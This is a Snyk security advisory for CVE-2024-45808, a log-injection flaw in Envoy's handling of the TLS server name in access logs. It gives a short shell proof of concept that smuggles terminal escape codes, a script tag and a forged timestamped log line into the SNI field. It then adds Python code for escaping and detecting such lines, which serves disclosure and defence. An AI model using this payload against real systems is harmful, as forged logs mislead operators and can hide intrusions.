Improper Output Neutralization for Logs Affecting envoyproxy/envoy package, versions [,1.28.7), [1.29.0,1.29.9), [1.30.0,1.30.6), [1.31.0,1.31.2)
Threat Intelligence
Exploit Maturity: Proof of concept
EPSS: 0.05% (19th percentile)
- Snyk ID SNYK-UNMANAGED-ENVOYPROXYENVOY-8062355
- published 20 Sep 2024
- disclosed 20 Sep 2024
- credit John Howard
Introduced: 20 Sep 2024
CVE-2024-45808
How to fix?
Upgrade envoyproxy/envoy to version 1.28.7, 1.29.9, 1.30.6, 1.31.2 or higher.
Overview
Affected versions of this package are vulnerable to Improper Output Neutralization for Logs because the REQUESTED_SERVER_NAME field is written by access loggers without validation or escaping. The field is client-controlled (it carries the TLS server name the client sends), so an attacker can inject unexpected content, such as the fake log line and terminal escape sequence in the PoC below, into access logs.
PoC
blue='\e[0;34m'
x=$(echo -e $blue)
client https://10.36.1.114/ --server-name "foo.com${x}this is blue
end<script>alert()</script>
[2022-01-05T17:14:26.823Z] fake log"
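The following is an added example and is not Envoy's code or part of this advisory. It shows, in Python, the write-time neutralization that closes this bug class (escaping control characters in a client-controlled field such as the SNI before it lands in the log record), next to a detection pass over existing log lines. The record format, the function names and the sample log lines are constructed for illustration; the SNI payload is the one from the PoC above.

```python
import re

# Write-time neutralization: rewrite every C0 control character, DEL and the
# backslash itself as \xNN or \\, so a client-controlled field (here the TLS
# SNI that an access-log formatter such as %REQUESTED_SERVER_NAME% prints)
# can neither terminate the record with a newline nor emit ANSI escapes.
_CONTROL = re.compile(r'[\x00-\x1f\x7f\\]')


def neutralize_log_field(value: str) -> str:
    return _CONTROL.sub(
        lambda m: '\\\\' if m.group() == '\\' else f'\\x{ord(m.group()):02x}',
        value,
    )


def format_access_log(timestamp: str, sni: str, path: str, status: int) -> str:
    # Constructed single-line record; the layout is illustrative, not Envoy's.
    return f'[{timestamp}] "{path}" {status} sni={neutralize_log_field(sni)}'


# Detection over logs that were written without neutralization. A record must
# start with a bracketed timestamp; a line that does not is a continuation
# produced by an injected newline. An ANSI escape (ESC '[') inside a line is a
# second direct indicator of this class of injection.
_RECORD_START = re.compile(r'^\[\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}Z\] ')
_ANSI = re.compile(r'\x1b\[[0-9;]*[A-Za-z]')


def find_suspicious_lines(lines):
    flagged = []
    for number, line in enumerate(lines, 1):
        reasons = []
        if _ANSI.search(line):
            reasons.append('ansi-escape')
        if not _RECORD_START.match(line):
            reasons.append('no-record-start')
        if reasons:
            flagged.append((number, reasons))
    return flagged


# Constructed sample input: the SNI payload from the PoC, as the logger sees it
# after the shell has expanded the escape sequence and the embedded newlines.
PAYLOAD_SNI = ('foo.com\x1b[0;34mthis is blue\n'
               'end<script>alert()</script>\n'
               '[2022-01-05T17:14:26.823Z] fake log')

# What an unneutralized logger would have written: one request becomes three
# lines, and the third looks like an independent, well-formed record.
RAW_LOG = f'[2024-09-20T10:00:00.000Z] "/" 200 sni={PAYLOAD_SNI}'.split('\n')


def demo():
    safe_record = format_access_log('2024-09-20T10:00:00.000Z', PAYLOAD_SNI, '/', 200)
    return safe_record, find_suspicious_lines(RAW_LOG)


if __name__ == '__main__':
    record, findings = demo()
    print(record)
    print(findings)
```

The detection pass flags the line carrying the ANSI escape and the orphaned continuation line, but the forged `[2022-01-05T17:14:26.823Z] fake log` record passes the structural check because it is indistinguishable from a genuine one after the fact. That is why the fix belongs at write time: once the field is escaped, the whole request stays on one line and the forged timestamp is just text inside the `sni=` value.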